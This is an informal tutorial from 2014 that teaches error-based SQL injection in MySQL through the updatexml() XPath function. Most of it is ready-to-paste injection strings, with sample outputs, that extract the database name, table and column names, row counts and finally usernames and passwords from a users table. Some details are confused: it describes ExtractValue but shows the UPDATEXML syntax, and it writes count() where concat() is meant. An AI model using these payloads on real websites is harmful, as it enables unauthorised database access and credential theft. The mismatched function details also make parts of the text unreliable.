After discussing Basic Injections, now we can move to XPATH injection frankly speaking this onez my favourite. Any body reading this tutorial i Suppose he read the "Complete Guide of SQL injection".

Now we can continue our discussion after the Basic Union based and Bypassing Row Limit injections comes XPATH. Things to keep in mind if you landed on this page searching for Specifically XPATH Based injection then let me tell you its the wrong place. Here we are not actually injecting into XPATH, we are just using one of the XPATH function which is Extractvalue() to generate error and get the output.

The "ExtractValue" function in MySQL runs an XPath query against a string representing XML data. The function takes input in the following form:

UPDATEXML(XMLType_Instance, XPath_string,value_expression, namespace_string)

If the XPath query is syntactically incorrect, we are presented with an error message:

XPATH syntax error: 'xpathqueryhere'

We use it in the same condition like other error based injections but sometimes if Extractvalue is not available or filtered by the firewall then we can use this one. When we try Union based query first step and do not get any output then we can try using Error based injection. For Example we used the below query and got no output." union select 1,2,3,4,5--

As you can see the double quote over there..that means this time we are injecting into a string type query where the query is like. Now we can easily assume the internal query.

select path from pages where view="<our_input_here>" limit 1,1;

So let us continue our injection using XPATH updateXML injection." and updatexml(null,concat(0x3a,(OUR QUERY HERE)),null)--

Getting the Current Database :" and updatexml(null,concat(0x3a,(0x0a,(select database()))),null)--
Output : XPATH syntax error: ':database_name_here'

as we got the Database let us continue :D

Getting tables in current Database:" and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--
Output : XPATH syntax error: ':table_name_here'

as you can see i used limit as we cannot extract long data which limits upto 32 characters. So i prefer :P to go one by one increasing the row to get the output. well if you want to dump the database go for any tool or manual proxy else create your own script to get the data dumped for you which I prefer to be the best option.

So Now lets assume we got the following tables using the above Query:

  • Posts
  • Assets
  • Banner
  • Links
  • Users

Let us continue and try to get the columns:" and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)),null)--
Output : XPATH syntax error: ':column_name_here'

Let Us say we got the 3 Columns:

  • id
  • username
  • password

Let us Dump the data from them, but before that lets count the number of Columns.

Counting the number of columns:" and updatexml(null,concat(0x3a,(select count(username) from users)),null)--
Output : XPATH syntax error: ':count_will_come_here'

You can use the same trick to count the tables or columns also. So now let us continue dumping the data" and updatexml(null,concat(0x3a,(select count(username,0x3a,password) from users limit 0,1)),null)--
Output : XPATH syntax error: ':Output_here'

If you have problem understand Limit or any other thing...i suggest to read the basics again.
Because whatever I used new I explained, what I dint explained was basics which I already covered earlier.

Author : Zenodermus Javanicus
Date : 2014-03-21